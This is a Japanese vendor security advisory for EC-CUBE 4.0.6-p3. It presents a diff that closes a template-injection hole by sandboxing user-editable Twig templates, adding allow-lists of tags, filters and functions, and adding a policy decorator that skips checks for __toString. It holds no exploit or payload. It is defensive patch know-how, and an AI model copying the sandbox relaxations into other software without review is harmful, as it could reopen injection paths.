以下のコード差分情報を参照して頂き、必要な箇所に修正を反映してください。

本修正方法はEC-CUBE 4.0.6-p3のバージョンを例として提示しております。  
過去バージョンをご利用の場合は、下記修正対象ファイルの修正差分を参考にご対応お願いいたします。  

**修正差分**

1.  app/config/eccube/packages/twig\_extensions.yaml +143 \-0
2.  src/Eccube/Resource/template/default/Product/detail.twig +1 \-1
3.  src/Eccube/Resource/template/default/default\_frame.twig +1 \-1
4.  src/Eccube/Twig/Extension/IgnoreTwigSandboxErrorExtension.php +78 \-0
5.  src/Eccube/Twig/Sandbox/SecurityPolicyDecorator.php +47 \-0

@@ -8,3 +8,146 @@ services:

8

8

  #Twig\\Extensions\\DateExtension: ~

9

9

  Twig\\Extensions\\IntlExtension: ~

10

10

  #Twig\\Extensions\\TextExtension: ~

11

+  

12

+ eccube.twig\_sandbox.policy:

13

+ class: Twig\\Sandbox\\SecurityPolicy

14

+ arguments:

15

+ $allowedTags: "%eccube.twig\_sandbox.allowed\_tags%"

16

+ $allowedFilters: "%eccube.twig\_sandbox.allowed\_filters%"

17

+ $allowedFunctions: "%eccube.twig\_sandbox.allowed\_functions%"

18

+ $allowedMethods: "%eccube.twig\_sandbox.allowed\_methods%"

19

+ $allowedProperties: "%eccube.twig\_sandbox.allowed\_properties%"

20

+ eccube.twig\_sandbox.extension:

21

+ class: Twig\\Extension\\SandboxExtension

22

+ arguments:

23

+ \- '@eccube.twig\_sandbox.policy'

24

+ \- false

25

+ tags: \['twig.extension'\]

26

+ Eccube\\Twig\\Sandbox\\SecurityPolicyDecorator:

27

+ decorates: 'eccube.twig\_sandbox.policy'

28

+ parameters:

29

+ eccube.twig\_sandbox.allowed\_tags:

30

+ \- 'apply'

31

+ \- 'block'

32

+ \- 'deprecated'

33

+ \- 'embed'

34

+ \- 'extends'

35

+ \- 'flush'

36

+ \- 'for'

37

+ \- 'if'

38

+ \- 'set'

39

+ \- 'spaceless'

40

+ \- 'verbatim'

41

+ \- 'with'

42

+ \- 'form\_theme'

43

+ \- 'stopwatch'

44

+ \- 'trans'

45

+ \- 'trans\_default\_domain'

46

+ eccube.twig\_sandbox.allowed\_filters:

47

+ \- 'abs'

48

+ \- 'batch'

49

+ \- 'capitalize'

50

+ \- 'column'

51

+ \- 'convert\_encoding'

52

+ \- 'date'

53

+ \- 'date\_modify'

54

+ \- 'default'

55

+ \- 'escape'

56

+ \- 'first'

57

+ \- 'format'

58

+ \- 'join'

59

+ \- 'json\_encode'

60

+ \- 'keys'

61

+ \- 'last'

62

+ \- 'length'

63

+ \- 'lower'

64

+ \- 'merge'

65

+ \- 'nl2br'

66

+ \- 'number\_format'

67

+ \- 'replace'

68

+ \- 'reverse'

69

+ \- 'round'

70

+ \- 'slice'

71

+ \- 'spaceless'

72

+ \- 'split'

73

+ \- 'striptags'

74

+ \- 'title'

75

+ \- 'trim'

76

+ \- 'upper'

77

+ \- 'url\_encode'

78

+ \- 'abbr\_class'

79

+ \- 'abbr\_method'

80

+ \- 'file\_link'

81

+ \- 'format\_args'

82

+ \- 'format\_args\_as\_text'

83

+ \- 'humanize'

84

+ \- 'trans'

85

+ \- 'yaml\_dump'

86

+ \- 'yaml\_encode'

87

+ \- 'date\_day'

88

+ \- 'date\_day\_with\_weekday'

89

+ \- 'date\_format'

90

+ \- 'date\_min'

91

+ \- 'date\_sec'

92

+ \- 'doctrine\_pretty\_query'

93

+ \- 'doctrine\_replace\_query\_parameters'

94

+ \- 'e'

95

+ \- 'ellipsis'

96

+ \- 'file\_ext\_icon'

97

+ \- 'form\_encode\_currency'

98

+ \- 'format\_log\_message'

99

+ \- 'no\_image\_product'

100

+ \- 'price'

101

+ \- 'time\_ago'

102

+ \- 'doctrine\_minify\_query'

103

+ \- 'localizedcurrency'

104

+ \- 'localizeddate'

105

+ \- 'localizednumber'

106

+ \- 'transchoice'

107

+ eccube.twig\_sandbox.allowed\_functions:

108

+ \- 'cycle'

109

+ \- 'date'

110

+ \- 'max'

111

+ \- 'min'

112

+ \- 'random'

113

+ \- 'range'

114

+ \- 'absolute\_url'

115

+ \- 'asset'

116

+ \- 'asset\_version'

117

+ \- 'csrf\_token'

118

+ \- 'is\_granted'

119

+ \- 'logout\_path'

120

+ \- 'logout\_url'

121

+ \- 'path'

122

+ \- 'relative\_path'

123

+ \- 'url'

124

+ \- 'active\_menus'

125

+ \- 'class\_categories\_as\_json'

126

+ \- 'csrf\_token\_for\_anchor'

127

+ \- 'currency\_symbol'

128

+ \- 'get\_all\_carts'

129

+ \- 'get\_cart'

130

+ \- 'get\_carts\_total\_price'

131

+ \- 'get\_carts\_total\_quantity'

132

+ \- 'has\_errors'

133

+ \- 'is\_reduced\_tax\_rate'

134

+ \- 'product'

135

+ \- 'workflow\_can'

136

+ \- 'workflow\_has\_marked\_place'

137

+ \- 'workflow\_marked\_places'

138

+ \- 'workflow\_transitions'

139

+ \- 'device\_version'

140

+ \- 'full\_view\_url'

141

+ \- 'is\_android\_os'

142

+ \- 'is\_device'

143

+ \- 'is\_full\_view'

144

+ \- 'is\_ios'

145

+ \- 'is\_mobile'

146

+ \- 'is\_mobile\_view'

147

+ \- 'is\_not\_mobile\_view'

148

+ \- 'is\_tablet'

149

+ \- 'is\_tablet\_view'

150

+ eccube.twig\_sandbox.allowed\_methods:

151

+ 'Symfony\\Bridge\\Twig\\AppVariable': \[ 'getrequest' \]

152

+ 'Symfony\\Component\\HttpFoundation\\Request': \[ 'geturi' \]

153

+ eccube.twig\_sandbox.allowed\_properties: \[\]

@@ -375,7 +375,7 @@ file that was distributed with this source code.

375

375

  </div>

376

376

  {% if Product.freearea %}

377

377

  <div class="ec-productRole\_\_description">

378

\- {{ include(template\_from\_string(Product.freearea)) }}

378

+ {{ include(template\_from\_string(Product.freearea), sandboxed = true) }}

379

379

  </div>

380

380

  {% endif %}

381

381

  </div>

@@ -28,7 +28,7 @@ file that was distributed with this source code.

28

28

  <meta name="robots" content="{{ Page.meta\_robots }}">

29

29

  {% endif %}

30

30

  {% if Page.meta\_tags is not empty %}

31

\- {{ include(template\_from\_string(Page.meta\_tags)) }}

31

+ {{ include(template\_from\_string(Page.meta\_tags), sandboxed = true) }}

32

32

  {% endif %}

33

33

  <link rel="icon" href="{{ asset('assets/img/common/favicon.ico', 'user\_data') }}">

34

34

  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css" integrity="sha384-HSMxcRTRxnN+Bdg0JdbxYKrThecOKuH5zCYotlSAcp1+c8xmyTe9GYg1l9a69psu" crossorigin="anonymous">

@@ -0,0 +1,78 @@

1

+ <?php

2

+  

3

+ /\*

4

+ \* This file is part of EC-CUBE

5

+ \*

6

+ \* Copyright(c) EC-CUBE CO.,LTD. All Rights Reserved.

7

+ \*

8

+ \* http://www.ec-cube.co.jp/

9

+ \*

10

+ \* For the full copyright and license information, please view the LICENSE

11

+ \* file that was distributed with this source code.

12

+ \*/

13

+  

14

+ namespace Eccube\\Twig\\Extension;

15

+  

16

+ use Twig\\Environment;

17

+ use Twig\\Error\\LoaderError;

18

+ use Twig\\Extension\\AbstractExtension;

19

+ use Twig\\Extension\\SandboxExtension;

20

+ use Twig\\Sandbox\\SecurityError;

21

+ use Twig\\TwigFunction;

22

+  

23

+ /\*\*

24

+ \* \\vendor\\twig\\twig\\src\\Extension\\CoreExtension の拡張

25

+ \*/

26

+ class IgnoreTwigSandboxErrorExtension extends AbstractExtension

27

+ {

28

+ /\*\*

29

+ \* {@inheritdoc}

30

+ \*/

31

+ public function getFunctions(): array

32

+ {

33

+ return \[

34

+ new TwigFunction('include', \[$this, 'twig\_include'\], \['needs\_environment' => true, 'needs\_context' => true, 'is\_safe' => \['all'\]\]),

35

+ \];

36

+ }

37

+  

38

+ /\*\*

39

+ \* twig sandboxの例外を操作します

40

+ \* app\_env = devの場合、エラーを表示する

41

+ \* app\_env = prodの場合、エラーを表示しない

42

+ \*

43

+ \* @param Environment $env

44

+ \* @param $context

45

+ \* @param $template

46

+ \* @param $variables

47

+ \* @param $withContext

48

+ \* @param $ignoreMissing

49

+ \* @param $sandboxed

50

+ \*

51

+ \* @return string|void

52

+ \*

53

+ \* @throws LoaderError

54

+ \* @throws SecurityError

55

+ \*/

56

+ public function twig\_include(Environment $env, $context, $template, $variables = \[\], $withContext = true, $ignoreMissing = false, $sandboxed = false)

57

+ {

58

+ try {

59

+ return \\twig\_include($env, $context, $template, $variables, $withContext, $ignoreMissing, $sandboxed);

60

+ } catch (SecurityError $e) {

61

+  

62

+ // devではエラー画面が表示されるようにする

63

+ $appEnv = env('APP\_ENV');

64

+ if ($appEnv === 'dev') {

65

+ throw $e;

66

+ } else {

67

+ // ログ出力

68

+ log\_warning($e->getMessage(), \['exception' => $e\]);

69

+  

70

+ // 例外がスローされた場合、sandboxが効いた状態になってしまうため追加

71

+ $sandbox = $env->getExtension(SandboxExtension::class);

72

+ if (!$sandbox->isSandboxedGlobally()) {

73

+ $sandbox->disableSandbox();

74

+ }

75

+ }

76

+ }

77

+ }

78

+ }

@@ -0,0 +1,47 @@

1

+ <?php

2

+  

3

+ /\*

4

+ \* This file is part of EC-CUBE

5

+ \*

6

+ \* Copyright(c) EC-CUBE CO.,LTD. All Rights Reserved.

7

+ \*

8

+ \* http://www.ec-cube.co.jp/

9

+ \*

10

+ \* For the full copyright and license information, please view the LICENSE

11

+ \* file that was distributed with this source code.

12

+ \*/

13

+  

14

+ namespace Eccube\\Twig\\Sandbox;

15

+  

16

+ use Twig\\Sandbox\\SecurityPolicy as BasePolicy;

17

+ use Twig\\Sandbox\\SecurityPolicyInterface;

18

+  

19

+ class SecurityPolicyDecorator implements SecurityPolicyInterface {

20

+  

21

+ /\*\* @var BasePolicy \*/

22

+ private $securityPolicy;

23

+  

24

+ public function \_\_construct(BasePolicy $securityPolicy)

25

+ {

26

+ $this->securityPolicy = $securityPolicy;

27

+ }

28

+  

29

+ public function checkSecurity($tags, $filters, $functions)

30

+ {

31

+ $this->securityPolicy->checkSecurity($tags, $filters, $functions);

32

+ }

33

+  

34

+ public function checkMethodAllowed($obj, $method)

35

+ {

36

+ // \_\_toStringの場合はチェックをスキップする

37

+ if ($method === '\_\_toString') {

38

+ return;

39

+ }

40

+ $this->securityPolicy->checkMethodAllowed($obj, $method);

41

+ }

42

+  

43

+ public function checkPropertyAllowed($obj, $method)

44

+ {

45

+ $this->securityPolicy->checkPropertyAllowed($obj, $method);

46

+ }

47

+ }

**問い合わせ先**

本脆弱性に関するお問合せ：

EC-CUBE 運営チーム  
MAIL: support@ec-cube.net

**謝辞**

本脆弱性は、

*   株式会社エヌ・エフ・ラボラトリーズ 三浦 剛様

よりご報告いただきました。  
この場をお借りして、厚く御礼申し上げます。

Tag

#git